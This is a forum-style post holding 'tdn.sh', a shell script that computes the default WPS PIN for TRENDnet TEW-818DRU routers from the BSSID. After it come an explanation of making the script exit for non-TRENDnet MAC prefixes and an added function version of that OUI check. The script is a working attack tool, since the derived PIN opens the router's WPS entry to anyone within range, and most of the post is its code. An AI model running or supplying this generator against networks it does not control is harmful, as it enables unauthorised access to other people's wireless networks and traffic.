# tdn.sh copyleft 25th June 2015 :
# This script is released under the General Public License version 3 from the Free Software Foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to according to GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
green="\033[01;32m"
ALGORITHM(){
###############################
# The algorithm can be divided into three steps. The first two steps are done in this function and the third one is done by the other function called "CHECKSUM()"
# 1) The first step in the algorithm consists in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined in this code as the variable "$SCRAMBLEDNIC" )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBLEDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separator we grab the last three bytes of the mac in reverse order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable "$CONVERTEDMAC". Some zero padding and a modulo reduction in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBLEDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM"
}
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are summed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our check digit: the sum reduced modulo 10 to its unit digit
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus the check digit ", modulo 10
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e "$green Macs vulnerables: $white 00:14:D1 - D8:EB:97 $NOcolor"
echo -e " --------------------------------------"
echo -e "$NOcolor"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
######### update july the 1st of 2015 for dk10v and the " awireless "X" project " :D #####################################################
# This part of the code checks whether the mac address belongs to trendnet or not
OUI=$( echo $BSSID | cut -c -8 ) # We grab the first half of the BSSID and store the value in $OUI
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The mac adress belongs to TRENDnet"
;;
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
;;
esac
ALGORITHM # function that scrambles the NIC part of the bssid and converts it from hexadecimal to decimal
CHECKSUM # function that generates the correct WPS checksum and gives the full default WPS PIN for the TEW-818DRU, credits to antares_145
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0
salu2
Look, I'll take the opportunity to explain how we would go about not generating the PIN when the MAC is not TRENDnet's.
At the end of the script
Once the case ... esac structure finishes, the two functions that generate the PIN are invoked (algorithm and checksum).
Then it is simply an echo command and, to finish the script, the exit instruction exit 0, where 0 stands for a clean exit with success status.
The question would be to distinguish the routers with a TRENDnet MAC from those without, so as to 1) in one case generate the PIN and print it to the console,
2) and in the other case close the script with an error message.
The distinction is already made, we have just programmed it with the control structure using the case ... esac statement.
In the case ... esac that we wrote we only give one echo command.
But we are not limited... we can put whatever commands we want, we just have to put a closing instruction ";;" to mark the point where we have finished the sequence of commands:
case expresion in
caso_1 )
comandos;;
caso_2 )
comandos;;
......
esac
Our statement goes like this: case 1, the MAC is good. Case 2, the MAC is not good.
In the first case we want to do what the script already did: generate the PIN and print it to the console (algorithm + checksum + echo)
so we leave it as it is
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The mac adress belongs to TRENDnet"
;;
then we still have to write the second case: we want to print the error message (MAC not TRENDnet) and... simply exit the script
and that is done with exit
what was:
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
;;
becomes
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
exit 1
;;
I have simply added exit 1 (an exit with error status, since we "break" our esac to leave without generating the PIN, etc.)
with a single command you get what you want:
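As an added example (not part of tdn.sh or of this thread), here is the same OUI control written as a function that returns a status code instead of calling exit directly, so the calling code decides between going on to generate the PIN and aborting with exit 1. The function names oui_check and report_oui are my own; the two prefixes are the ones tdn.sh lists as affected, and the sample BSSIDs are constructed.

```bash
#!/bin/bash
# Added example, not part of tdn.sh: the OUI control as a reusable function.
# It returns a status instead of calling exit, so the caller decides whether
# to go on (ALGORITHM + CHECKSUM + echo) or to stop with "exit 1".
#
# Return codes:
#   0 - OUI is one of the two TRENDnet prefixes tdn.sh lists as affected
#   1 - well-formed bSSID, but the OUI is not in that list
#   2 - malformed input (not six colon-separated hexadecimal bytes)

# Prefixes quoted in tdn.sh ("Macs vulnerables")
AFFECTED_OUIS="00:14:D1 D8:EB:97"

oui_check() {
    local bssid="$1" oui prefix
    # Same conformity filter tdn.sh applies to the typed bSSID
    if ! printf '%s\n' "$bssid" | grep -Eq '^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$'; then
        return 2
    fi
    # First three bytes (cut -c -8, as in tdn.sh), upper-cased so d8:eb:97 matches too
    oui=$(printf '%s' "$bssid" | cut -c -8 | tr 'a-f' 'A-F')
    for prefix in $AFFECTED_OUIS; do
        [ "$oui" = "$prefix" ] && return 0
    done
    return 1
}

# Mirrors the case/esac branches discussed in the thread, without exiting,
# so several BSSIDs can be checked in one run.
report_oui() {
    local rc=0
    oui_check "$1" || rc=$?
    case $rc in
        0) echo "$1: OUI-CHECK passed, the MAC belongs to TRENDnet (disable WPS on this device)" ;;
        1) echo "$1: OUI-CHECK FAILED, the MAC does not belong to TRENDnet, no PIN generated" ;;
        *) echo "$1: not a valid bSSID (expected xx:xx:xx:xx:xx:xx)" ;;
    esac
    return $rc
}

# Constructed sample values, not real access points
for sample in "D8:EB:97:11:22:33" "00:14:d1:aa:bb:cc" "AA:BB:CC:11:22:33" "00:14:D1:AA:BB"; do
    report_oui "$sample" || true
done
```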